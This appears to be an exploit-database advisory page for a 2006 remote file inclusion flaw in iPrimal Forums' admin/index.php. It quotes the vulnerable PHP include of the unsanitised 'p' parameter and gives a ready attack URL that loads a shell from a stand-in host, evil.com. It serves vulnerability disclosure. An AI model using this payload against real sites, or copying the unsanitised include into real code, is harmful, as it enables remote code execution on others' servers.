header-logo
Suggest Exploit
vendor:
Forums
by:
Bl0od3r
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Forums
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

iPrimal Forums Remote File Inclusion

A remote file inclusion vulnerability exists in iPrimal Forums due to insufficient sanitization of user-supplied input to the 'p' parameter in the 'admin/index.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:   #line 126-129
.....
if($_GET['p'] == ''){

echo 'Please select an item from the menu above.';

}else{

include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!

# milw0rm.com [2006-11-08]

Navigation

Suggest Exploit

Services By CQR